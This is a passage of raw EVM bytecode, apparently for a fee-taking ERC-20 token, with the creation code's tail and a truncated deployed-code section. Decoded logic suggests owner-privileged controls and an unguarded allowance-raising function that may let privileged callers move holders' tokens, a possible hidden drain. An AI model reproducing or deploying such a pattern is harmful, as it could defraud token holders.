01b03163314610c475760405162461bcd60e51b8152600401610a0890612d38565b601d80546001600160a01b039092166001600160a01b03199283168117909155601c8054909216179055565b6005546001600160a01b03163314610c9d5760405162461bcd60e51b8152600401610a0890612d38565b6000601555565b6000336109d2818585610cb78383611b51565b610cc19190612dbc565b611cf8565b60075460009081906001600160a01b038581169116148015610cf657506006546001600160a01b03848116911614155b9050808015610d1d57506001600160a01b0383166000908152601a602052604090205460ff165b15610d2757426008555b6001600160a01b0384166000908152601a602052604081205460ff1680610d6657506001600160a01b0384166000908152601a602052604090205460ff165b6007549091506001600160a01b0385811691161460008380610d855750815b601054909150158015908190610da55750600754600160a01b900460ff16155b8015610daf575083155b8015610db85750815b98975050505050505050565b6001600160a01b031660009081526020819052604090205490565b6005546001600160a01b03163314610e095760405162461bcd60e51b8152600401610a0890612d38565b610e1360006124e0565b565b6005546000906001600160a01b03163314610e425760405162461bcd60e51b8152600401610a0890612d38565b50600e805460ff19169055600190565b6005546001600160a01b03163314610e7c5760405162461bcd60e51b8152600401610a0890612d38565b6001600160a01b03919091166000908152601b60205260409020805460ff1916911515919091179055565b600080600760009054906101000a90046001600160a01b03166001600160a01b0316630dfe16816040518163ffffffff1660e01b8152600401602060405180830381865afa158015610efd573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610f219190612dcf565b90506000600760009054906101000a90046001600160a01b03166001600160a01b031663d21220a76040518163ffffffff1660e01b8152600401602060405180830381865afa158015610f78573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610f9c9190612dcf565b600a54909150600090610fb7906001600160a01b0316610dc4565b600854600e546201000090046001600160a01b03166000908152600f6020526040902054919250108015610fe9575080155b610ff257600080fd5b600080600760009054906101000a90046001600160a01b03166001600160a01b0316630902f1ac6040518163ffffffff1660e01b8152600401606060405180830381865afa158015611048573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061106c9190612e03565b50601e54601d5492945090925090600160a01b900460ff16156110f357306001600160a01b0316638e15f4736040518163ffffffff1660e01b815260040160a060405180830381865afa1580156110c7573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110eb9190612e6d565b509193505050505b6000856001600160a01b031663313ce5676040518163ffffffff1660e01b8152600401602060405180830381865afa158015611133573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111579190612ebd565b60ff16876001600160a01b031663313ce5676040518163ffffffff1660e01b8152600401602060405180830381865afa158015611198573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111bc9190612ebd565b6111ca9060ff16600a612fc4565b6111dd846001600160701b038716612d83565b6111e79190612d83565b6111f19190612d9a565b90506112066001600160701b03851682612d9a565b97505050505050505090565b6005546001600160a01b0316331461123c5760405162461bcd60e51b8152600401610a0890612d38565b600e805461ff00191661010017905542600855565b600080600080600080600080600080601c60009054906101000a90046001600160a01b03166001600160a01b031663feaf968c6040518163ffffffff1660e01b815260040160a060405180830381865afa1580156112b3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112d79190612e6d565b939e929d50909b50995090975095505050505050565b60606004805461094190612cfe565b6005546001600160a01b031633146113265760405162461bcd60e51b8152600401610a0890612d38565b6007546001600160a01b03908116908316036113aa5760405162461bcd60e51b815260206004820152603960248201527f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060448201527f6175746f6d617465644d61726b65744d616b65725061697273000000000000006064820152608401610a08565b6113b48282612532565b604051811515906001600160a01b038416907fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab90600090a35050565b6001600160a01b0383166114465760405162461bcd60e51b815260206004820152601a60248201527f5f746f6b656e20616464726573732063616e6e6f7420626520300000000000006044820152606401610a08565b6040805160028082526060820183526000926020830190803683375050600654604080516315ab88c960e31b815290519394506001600160a01b039091169263ad5c4648925060048083019260209291908290030181865afa1580156114b0573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906114d49190612dcf565b816000815181106114e7576114e7612fd0565b60200260200101906001600160a01b031690816001600160a01b031681525050308160018151811061151b5761151b612fd0565b6001600160a01b03909216602092830291909101820152336000908152601a909152604090205460ff16156115f757836001600160a01b03166323b872dd848360018151811061156d5761156d612fd0565b60209081029190910101516040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604481018590526064016020604051808303816000875af11580156115cc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906115f09190612fe6565b5050505050565b60065460405163b6f9de9560e01b81526001600160a01b039091169063b6f9de9590849061163290600090869061dead904290600401613047565b6000604051808303818588803b15801561164b57600080fd5b505af115801561165f573d6000803e3d6000fd5b505050505050505050565b600033816116788286611b51565b9050838110156116d85760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610a08565b610c128286868403611cf8565b6000336109d2818585611e96565b6005546001600160a01b0316331461171d5760405162461bcd60e51b8152600401610a0890612d38565b600980546001600160a01b0319166001600160a01b0392909216919091179055565b6005546001600160a01b031633146117695760405162461bcd60e51b8152600401610a0890612d38565b6000601455565b6005546001600160a01b0316331461179a5760405162461bcd60e51b8152600401610a0890612d38565b6001600160a01b0382166000818152601a6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6005546001600160a01b031633146118235760405162461bcd60e51b8152600401610a0890612d38565b670de0b6b3a76400006103e861183860025490565b611843906005612d83565b61184d9190612d9a565b6118579190612d9a565b8110156118b25760405162461bcd60e51b8152602060048201526024808201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e20604482015263302e352560e01b6064820152608401610a08565b6118c481670de0b6b3a7640000612d83565b600d5550565b6005546001600160a01b031633146118f45760405162461bcd60e51b8152600401610a0890612d38565b601d54600160a01b900460ff161561194e5760405162461bcd60e51b815260206004820152601c60248201527f7072696365206f7261636c6520616c726561647920656e61626c6564000000006044820152606401610a08565b601d805460ff60a01b1916600160a01b179055565b6005546000906001600160a01b031633146119905760405162461bcd60e51b8152600401610a0890612d38565b620186a061199d60025490565b6119a8906001612d83565b6119b29190612d9a565b821015611a1f5760405162461bcd60e51b815260206004820152603560248201527f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60448201527410181718181892903a37ba30b61039bab838363c9760591b6064820152608401610a08565b6103e8611a2b60025490565b611a36906005612d83565b611a409190612d9a565b821115611aac5760405162461bcd60e51b815260206004820152603460248201527f5377617020616d6f756e742063616e6e6f742062652068696768657220746861604482015273371018171a92903a37ba30b61039bab838363c9760611b6064820152608401610a08565b50600c81905560015b919050565b6005546001600160a01b03163314611ae45760405162461bcd60e51b8152600401610a0890612d38565b601d54600160a01b900460ff161515600114611b425760405162461bcd60e51b815260206004820152601d60248201527f7072696365206f7261636c6520616c72656164792064697361626c65640000006044820152606401610a08565b601d805460ff60a01b19169055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6005546001600160a01b03163314611ba65760405162461bcd60e51b8152600401610a0890612d38565b610a11611bb230610dc4565b612560565b6000611bc9833084610cb78730611b51565b50600192915050565b6005546001600160a01b03163314611bfc5760405162461bcd60e51b8152600401610a0890612d38565b600a80546001600160a01b0319166001600160a01b0392909216919091179055565b6005546001600160a01b03163314611c485760405162461bcd60e51b8152600401610a0890612d38565b6001600160a01b038116611cad5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610a08565b610a71816124e0565b6005546001600160a01b03163314611ce05760405162461bcd60e51b8152600401610a0890612d38565b611cf281670de0b6b3a76400006126ba565b601e5550565b6001600160a01b038316611d5a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610a08565b6001600160a01b038216611dbb5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610a08565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000611e288484611b51565b90506000198114611e905781811015611e835760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610a08565b611e908484848403611cf8565b50505050565b6001600160a01b0383166000908152601a602052604081205460ff1680611ed557506001600160a01b0383166000908152601a602052604090205460ff165b90506001600160a01b038416611efd5760405162461bcd60e51b8152600401610a089061307c565b6001600160a01b038316611f235760405162461bcd60e51b8152600401610a08906130c1565b81600003611f3757611e90848460006126cd565b6007546000906001600160a01b038681169116148015611f7057506001600160a01b0384166000908152601b602052604090205460ff16155b6007549091506000906001600160a01b038681169116148015611fac57506001600160a01b0386166000908152601b602052604090205460ff16155b90506000611fc26005546001600160a01b031690565b6001600160a01b0316876001600160a01b03161480611fee57506005546001600160a01b038781169116145b905060006001600160a01b038716158061201257506001600160a01b03871661dead145b90506000828061201f5750815b806120335750600754600160a01b900460ff165b600e5490915060ff168015612046575080155b1561221e57600e54610100900460ff168061205e5750855b6120a35760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b6044820152606401610a08565b841561217857600b548711156121195760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b6064820152608401610a08565b600d5461212589610dc4565b61212f9089612dbc565b11156121735760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b6044820152606401610a08565b61221e565b8361221e576001600160a01b0388166000908152601b602052604090205460ff161580156121bf57506001600160a01b0389166000908152601b602052604090205460ff16155b1561221e57600d546121d089610dc4565b6121da9089612dbc565b111561221e5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b6044820152606401610a08565b6001600160a01b0389166000908152601f602052604090205460ff161561227f576001600160a01b0388166000908152600f6020526040812054900361227a576001600160a01b0388166000908152600f602052604090204290555b6122b3565b600754600160a01b900460ff166122b357600e805462010000600160b01b031916620100006001600160a01b038c16021790555b600754600160a01b900460ff161580156122e657506001600160a01b0389166000908152601f602052604090205460ff16155b801561230b57506001600160a01b0389166000908152601a602052604090205460ff16155b801561233057506001600160a01b0388166000908152601a602052604090205460ff16155b1561239557600061234030610dc4565b600c54909150811015612351612821565b801561235a5750805b8015612364575087155b15612392576007805460ff60a01b1916600160a01b17905561238461283d565b6007805460ff60a01b191690555b50505b60006123a18a8a610cc6565b905080156124c95760105460115486156123da576014546010546123c59190612dbc565b91506014546011546123d79190612dbc565b90505b8715612405576015546010546123f09190612dbc565b91506015546011546124029190612dbc565b90505b600061241c60646124168d866126ba565b90612a71565b9050826012548261242d9190612d83565b6124379190612d9a565b601860008282546124489190612dbc565b909155508390506124598383612d83565b6124639190612d9a565b601660008282546124749190612dbc565b909155505060135483906124889083612d83565b6124929190612d9a565b601760008282546124a39190612dbc565b909155505080156124b9576124b98d30836126cd565b6124c3818c613104565b9a505050505b6124d48a8a8a6126cd565b50505050505050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b0382166000908152601f60205260409020805460ff19168215151790556113b48282610e52565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061259557612595612fd0565b6001600160a01b03928316602091820292909201810191909152600654604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156125ee573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906126129190612dcf565b8160018151811061262557612625612fd0565b6001600160a01b03928316602091820292909201015260065461264b9130911684611cf8565b60065460405163791ac94760e01b81526001600160a01b039091169063791ac94790612684908590600090869030904290600401613117565b600060405180830381600087803b15801561269e57600080fd5b505af11580156126b2573d6000803e3d6000fd5b505050505050565b60006126c68284612d83565b9392505050565b6001600160a01b0383166126f35760405162461bcd60e51b8152600401610a089061307c565b6001600160a01b0382166127195760405162461bcd60e51b8152600401610a08906130c1565b6001600160a01b038316600090815260208190526040902054818110156127915760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610a08565b6001600160a01b038085166000908152602081905260408082208585039055918516815290812080548492906127c8908490612dbc565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161281491815260200190565b60405180910390a3611e90565b60008061282c610ea7565b116128375750600090565b50600190565b600061284830610dc4565b9050600060175460165460185461285f9190612dbc565b6128699190612dbc565b9050811580612876575080155b1561287f575050565b600c5482111561288f57600c5491505b6000600282601854856128a29190612d83565b6128ac9190612d9a565b6128b69190612d9a565b905060006128c48483612a7d565b9050476128d082612560565b60006128dc4783612a7d565b905060006128f986612416601654856126ba90919063ffffffff16565b9050600061291687612416601754866126ba90919063ffffffff16565b90506000816129258486613104565b61292f9190613104565b90506000871180156129415750600081115b15612994576129508782612a89565b601854604080518881526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b60006018819055601681905560178190556009546040516001600160a01b039091169085908381818185875af1925050503d80600081146129f1576040519150601f19603f3d011682016040523d82523d6000602084013e6129f6565b606091505b5050905080612a0457600080fd5b600a546040516000916001600160a01b03169085908381818185875af1925050503d8060008114612a51576040519150601f19603f3d011682016040523d82523d6000602084013e612a56565b606091505b5050905080612a6457600080fd5b5050505050505050505050565b60006126c68284612d9a565b60006126c68284613104565b600654612aa19030906001600160a01b031684611cf8565b6006546001600160a01b031663f305d719823085600080612aca6005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015612b32573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906115f09190613153565b600060208083528351808285015260005b81811015612b8457858101830151858201604001528201612b68565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610a7157600080fd5b60008060408385031215612bcd57600080fd5b8235612bd881612ba5565b946020939093013593505050565b600060208284031215612bf857600080fd5b5035919050565b600080600060608486031215612c1457600080fd5b505081359360208301359350604090920135919050565b600080600060608486031215612c4057600080fd5b8335612c4b81612ba5565b92506020840135612c5b81612ba5565b929592945050506040919091013590565b600060208284031215612c7e57600080fd5b81356126c681612ba5565b60008060408385031215612c9c57600080fd5b8235612ca781612ba5565b91506020830135612cb781612ba5565b809150509250929050565b8015158114610a7157600080fd5b60008060408385031215612ce357600080fd5b8235612cee81612ba5565b91506020830135612cb781612cc2565b600181811c90821680612d1257607f821691505b602082108103612d3257634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b80820281158282048414176109d8576109d8612d6d565b600082612db757634e487b7160e01b600052601260045260246000fd5b500490565b808201808211156109d8576109d8612d6d565b600060208284031215612de157600080fd5b81516126c681612ba5565b80516001600160701b0381168114611ab557600080fd5b600080600060608486031215612e1857600080fd5b612e2184612dec565b9250612e2f60208501612dec565b9150604084015163ffffffff81168114612e4857600080fd5b809150509250925092565b805169ffffffffffffffffffff81168114611ab557600080fd5b600080600080600060a08688031215612e8557600080fd5b612e8e86612e53565b9450602086015193506040860151925060608601519150612eb160808701612e53565b90509295509295909350565b600060208284031215612ecf57600080fd5b815160ff811681146126c657600080fd5b600181815b80851115612f1b578160001904821115612f0157612f01612d6d565b80851615612f0e57918102915b93841c9390800290612ee5565b509250929050565b600082612f32575060016109d8565b81612f3f575060006109d8565b8160018114612f555760028114612f5f57612f7b565b60019150506109d8565b60ff841115612f7057612f70612d6d565b50506001821b6109d8565b5060208310610133831016604e8410600b8410161715612f9e575081810a6109d8565b612fa88383612ee0565b8060001904821115612fbc57612fbc612d6d565b029392505050565b60006126c68383612f23565b634e487b7160e01b600052603260045260246000fd5b600060208284031215612ff857600080fd5b81516126c681612cc2565b600081518084526020808501945080840160005b8381101561303c5781516001600160a01b031687529582019590820190600101613017565b509495945050505050565b8481526080602082015260006130606080830186613003565b6001600160a01b03949094166040830152506060015292915050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b818103818111156109d8576109d8612d6d565b85815284602082015260a06040820152600061313660a0830186613003565b6001600160a01b0394909416606083015250608001529392505050565b60008060006060848603121561316857600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220e9120bc4cf504ec4fe7050f83c31fe2e6ff44847182156930a663bf83e27020f64736f6c634300081200334f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572

Deployed Bytecode

0x6080604052600436106102e85760003560e01c80638a8c523c11610190578063c0246668116100dc578063df778d2611610095578063f023f5731161006f578063f023f573146108bc578063f2fde38b146108dc578063fea4fa4d146108fc578063fefa5ce31461091257600080fd5b8063df778d261461086d578063e4ea8db614610882578063e73b90cd146108a257600080fd5b8063c0246668146107c3578063c18bc195146107e3578063c862c28b14610803578063d257b34f14610818578063dd1e1ca914610838578063dd62ed3e1461084d57600080fd5b8063a3f4908711610149578063aacebbe311610123578063aacebbe314610731578063ae76b09014610751578063b1d9208514610766578063b62496f51461079357600080fd5b8063a3f49087146106d1578063a457c2d7146106f1578063a9059cbb1461071157600080fd5b80638a8c523c146105fd5780638da5cb5b146106125780638e15f4731461063057806395d89b411461067c5780639a7a23d6146106915780639c74daf0146106b157600080fd5b8063313ce5671161024f578063704d9bcb11610208578063751039fc116101e2578063751039fc1461059d5780637571336a146105b257806376d15985146105d257806382247ec0146105e757600080fd5b8063704d9bcb1461054857806370a0823114610568578063715018a61461058857600080fd5b8063313ce56714610466578063339578fe1461048257806339509351146104975780634fbee193146104b7578063583e0568146104f05780636d77ecd11461052857600080fd5b8063203e727e116102a1578063203e727e146103b157806322429085146103d157806323b872dd146103f157806323bf4c861461041157806327f4d7d5146104315780632fd689e31461045057600080fd5b806304beaeb8146102f457806306fdde031461031d578063095ea7b31461033f57806312b77e8a1461036f57806318160ddd14610386578063199ffc721461039b57600080fd5b366102ef57005b600080fd5b34801561030057600080fd5b5061030a600b5481565b6040519081526020015b60405180910390f35b34801561032957600080fd5b50610332610932565b6040516103149190612b57565b34801561034b57600080fd5b5061035f61035a366004612bba565b6109c4565b6040519015158152602001610314565b34801561037b57600080fd5b506103846109de565b005b34801561039257600080fd5b5060025461030a565b3480156103a757600080fd5b5061030a60195481565b3480156103bd57600080fd5b506103846103cc366004612be6565b610a74565b3480156103dd57600080fd5b506103846103ec366004612bff565b610b51565b3480156103fd57600080fd5b5061035f61040c366004612c2b565b610bf9565b34801561041d57600080fd5b5061038461042c366004612c6c565b610c1d565b34801561043d57600080fd5b50600e5461035f90610100900460ff1681565b34801561045c57600080fd5b5061030a600c5481565b34801561047257600080fd5b5060405160128152602001610314565b34801561048e57600080fd5b50610384610c73565b3480156104a357600080fd5b5061035f6104b2366004612bba565b610ca4565b3480156104c357600080fd5b5061035f6104d2366004612c6c565b6001600160a01b03166000908152601a602052604090205460ff1690565b3480156104fc57600080fd5b50600654610510906001600160a01b031681565b6040516001600160a01b039091168152602001610314565b34801561053457600080fd5b50601d54610510906001600160a01b031681565b34801561055457600080fd5b5061035f610563366004612c89565b610cc6565b34801561057457600080fd5b5061030a610583366004612c6c565b610dc4565b34801561059457600080fd5b50610384610ddf565b3480156105a957600080fd5b5061035f610e15565b3480156105be57600080fd5b506103846105cd366004612cd0565b610e52565b3480156105de57600080fd5b5061030a610ea7565b3480156105f357600080fd5b5061030a600d5481565b34801561060957600080fd5b50610384611212565b34801561061e57600080fd5b506005546001600160a01b0316610510565b34801561063c57600080fd5b50610645611251565b6040805169ffffffffffffffffffff968716815260208101959095528401929092526060830152909116608082015260a001610314565b34801561068857600080fd5b506103326112ed565b34801561069d57600080fd5b506103846106ac366004612cd0565b6112fc565b3480156106bd57600080fd5b50600754610510906001600160a01b031681565b3480156106dd57600080fd5b506103846106ec366004612c2b565b6113f0565b3480156106fd57600080fd5b5061035f61070c366004612bba565b61166a565b34801561071d57600080fd5b5061035f61072c366004612bba565b6116e5565b34801561073d57600080fd5b5061038461074c366004612c6c565b6116f3565b34801561075d57600080fd5b5061038461173f565b34801561077257600080fd5b5061030a610781366004612c6c565b600f6020526000908152604090205481565b34801561079f57600080fd5b5061035f6107ae366004612c6c565b601f6020526000908152604090205460ff1681565b3480156107cf57600080fd5b506103846107de366004612cd0565b611770565b3480156107ef57600080fd5b506103846107fe366004612be6565b6117f9565b34801561080f57600080fd5b506103846118ca565b34801561082457600080fd5b5061035f610833366004612be6565b611963565b34801561084457600080fd5b50610384611aba565b34801561085957600080fd5b5061030a610868366004612c89565b611b51565b34801561087957600080fd5b50610384611b7c565b34801561088e57600080fd5b5061035f61089d366004612bba565b611bb7565b3480156108ae57600080fd5b50600e5461035f9060ff1681565b3480156108c857600080fd5b506103846108d7366004612c6c565b611bd2565b3480156108e857600080fd5b506103846108f7366004612c6c565b611c1e565b34801561090857600080fd5b5061030a60105481565b34801561091e57600080fd5b5061038461092d366004612be6565b611cb6565b60606003805461094190612cfe565b80601f016020809104026020016040519081016040528092919081815260200182805461096d90612cfe565b80156109ba5780601f1061098f576101008083540402835291602001916109ba565b820191906000526020600020905b81548152906001019060200180831161099d57829003601f168201915b5050505050905090565b6000336109d2818585611cf8565b60019150505b92915050565b6005546001600160a01b03163314610a115760405162461bcd60e51b8152600401610a0890612d38565b60405180910390fd5b6009546040516000916001600160a01b03169047908381818185875af1925050503d8060008114610a5e576040519150601f19603f3d011682016040523d82523d6000602084013e610a63565b606091505b5050905080610a7157600080fd5b50565b6005546001600160a01b03163314610a9e5760405162461bcd60e51b8152600401610a0890612d38565b670de0b6b3a76400006103e8610ab360025490565b610abe906001612d83565b610ac89190612d9a565b610ad29190612d9a565b811015610b395760405162461bcd60e51b815260206004820152602f60248201527f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060448201526e6c6f776572207468616e20302e312560881b6064820152608401610a08565b610b4b81670de0b6b3a7640000612d83565b600b5550565b6005546001600160a01b03163314610b7b5760405162461bcd60e51b8152600401610a0890612d38565b60118390556013829055601281905580610b958385612dbc565b610b9f9190612dbc565b6010819055600a1015610bf45760405162461bcd60e51b815260206004820152601d60248201527f4d757374206b656570206665657320617420313025206f72206c6573730000006044820152606401610a08565b505050565b600033610c07858285611e1c565b610c12858585611e96565b506001949350505050565b6005546001600160a01b03163314610c475760405162461bcd60e51b8152600401610a0890612d38565b601d80546001600160a01b039092166001600160a01b03199283168117909155601c8054909216179055565b6005546001600160a01b03163314610c9d5760405162461bcd60e51b8152600401610a0890612d38565b6000601555565b6000336109d2818585610cb78383611b51565b610cc19190612dbc565b611cf8565b60075460009081906001600160a01b038581169116148015610cf657506006546001600160a01b03848116911614155b9050808015610d1d57506001600160a01b0383166000908152601a602052604090205460ff165b15610d2757426008555b6001600160a01b0384166000908152601a602052604081205460ff1680610d6657506001600160a01b0384166000908152601a602052604090205460ff165b6007549091506001600160a01b0385811691161460008380610d855750815b601054909150158015908190610da55750600754600160a01b900460ff16155b8015610daf575083155b8015610db85750815b98975050505050505050565b6001600160a01b031660009081526020819052604090205490565b6005546001600160a01b03163314610e095760405162461bcd60e51b8152600401610a0890612d38565b610e1360006124e0565b565b6005546000906001600160a01b03163314610e425760405162461bcd60e51b8152600401610a0890612d38565b50600e805460ff19169055600190565b6005546001600160a01b03163314610e7c5760405162461bcd60e51b8152600401610a0890612d38565b6001600160a01b03919091166000908152601b60205260409020805460ff1916911515919091179055565b600080600760009054906101000a90046001600160a01b03166001600160a01b0316630dfe16816040518163ffffffff1660e01b8152600401602060405180830381865afa158015610efd573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610f219190612dcf565b90506000600760009054906101000a90046001600160a01b03166001600160a01b031663d21220a76040518163ffffffff1660e01b8152600401602060405180830381865afa158015610f78573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610f9c9190612dcf565b600a54909150600090610fb7906001600160a01b0316610dc4565b600854600e546201000090046001600160a01b03166000908152600f6020526040902054919250108015610fe9575080155b610ff257600080fd5b600080600760009054906101000a90046001600160a01b03166001600160a01b0316630902f1ac6040518163ffffffff1660e01b8152600401606060405180830381865afa158015611048573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061106c9190612e03565b50601e54601d5492945090925090600160a01b900460ff16156110f357306001600160a01b0316638e15f4736040518163ffffffff1660e01b815260040160a060405180830381865afa1580156110c7573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110eb9190612e6d565b509193505050505b6000856001600160a01b031663313ce5676040518163ffffffff1660e01b8152600401602060405180830381865afa158015611133573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111579190612ebd565b60ff16876001600160a01b031663313ce5676040518163ffffffff1660e01b8152600401602060405180830381865afa158015611198573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111bc9190612ebd565b6111ca9060ff16600a612fc4565b6111dd846001600160701b038716612d83565b6111e79190612d83565b6111f19190612d9a565b90506112066001600160701b03851682612d9a565b97505050505050505090565b6005546001600160a01b0316331461123c5760405162461bcd60e51b8152600401610a0890612d38565b600e805461ff00191661010017905542600855565b600080600080600080600080600080601c60009054906101000a90046001600160a01b03166001600160a01b031663feaf968c6040518163ffffffff1660e01b815260040160a060405180830381865afa1580156112b3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112d79190612e6d565b939e929d50909b50995090975095505050505050565b60606004805461094190612cfe565b6005546001600160a01b031633146113265760405162461bcd60e51b8152600401610a0890612d38565b6007546001600160a01b03908116908316036113aa5760405162461bcd60e51b815260206004820152603960248201527f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060448201527f6175746f6d617465644d61726b65744d616b65725061697273000000000000006064820152608401610a08565b6113b48282612532565b604051811515906001600160a01b038416907fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab90600090a35050565b6001600160a01b0383166114465760405162461bcd60e51b815260206004820152601a60248201527f5f746f6b656e20616464726573732063616e6e6f7420626520300000000000006044820152606401610a08565b6040805160028082526060820183526000926020830190803683375050600654604080516315ab88c960e31b815290519394506001600160a01b039091169263ad5c4648925060048083019260209291908290030181865afa1580156114b0573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906114d49190612dcf565b816000815181106114e7576114e7612fd0565b60200260200101906001600160a01b031690816001600160a01b031681525050308160018151811061151b5761151b612fd0565b6001600160a01b03909216602092830291909101820152336000908152601a909152604090205460ff16156115f757836001600160a01b03166323b872dd848360018151811061156d5761156d612fd0565b60209081029190910101516040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604481018590526064016020604051808303816000875af11580156115cc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906115f09190612fe6565b5050505050565b60065460405163b6f9de9560e01b81526001600160a01b039091169063b6f9de9590849061163290600090869061dead904290600401613047565b6000604051808303818588803b15801561164b57600080fd5b505af115801561165f573d6000803e3d6000fd5b505050505050505050565b600033816116788286611b51565b9050838110156116d85760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610a08565b610c128286868403611cf8565b6000336109d2818585611e96565b6005546001600160a01b0316331461171d5760405162461bcd60e51b8152600401610a0890612d38565b600980546001600160a01b0319166001600160a01b0392909216919091179055565b6005546001600160a01b031633146117695760405162461bcd60e51b8152600401610a0890612d38565b6000601455565b6005546001600160a01b0316331461179a5760405162461bcd60e51b8152600401610a0890612d38565b6001600160a01b0382166000818152601a6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6005546001600160a01b031633146118235760405162461bcd60e51b8152600401610a0890612d38565b670de0b6b3a76400006103e861183860025490565b611843906005612d83565b61184d9190612d9a565b6118579190612d9a565b8110156118b25760405162461bcd60e51b8152602060048201526024808201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e20604482015263302e352560e01b6064820152608401610a08565b6118c481670de0b6b3a7640000612d83565b600d5550565b6005546001600160a01b031633146118f45760405162461bcd60e51b8152600401610a0890612d38565b601d54600160a01b900460ff161561194e5760405162461bcd60e51b815260206004820152601c60248201527f7072696365206f7261636c6520616c726561647920656e61626c6564000000006044820152606401610a08565b601d805460ff60a01b1916600160a01b179055565b6005546000906001600160a01b031633146119905760405162461bcd60e51b8152600401610a0890612d38565b620186a061199d60025490565b6119a8906001612d83565b6119b29190612d9a565b821015611a1f5760405162461bcd60e51b815260206004820152603560248201527f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60448201527410181718181892903a37ba30b61039bab838363c9760591b6064820152608401610a08565b6103e8611a2b60025490565b611a36906005612d83565b611a409190612d9a565b821115611aac5760405162461bcd60e51b815260206004820152603460248201527f5377617020616d6f756e742063616e6e6f742062652068696768657220746861604482015273371018171a92903a37ba30b61039bab838363c9760611b6064820152608401610a08565b50600c81905560015b919050565b6005546001600160a01b03163314611ae45760405162461bcd60e51b8152600401610a0890612d38565b601d54600160a01b900460ff161515600114611b425760405162461bcd60e51b815260206004820152601d60248201527f7072696365206f7261636c6520616c72656164792064697361626c65640000006044820152606401610a08565b601d805460ff60a01b19169055565b6001600160a01b0391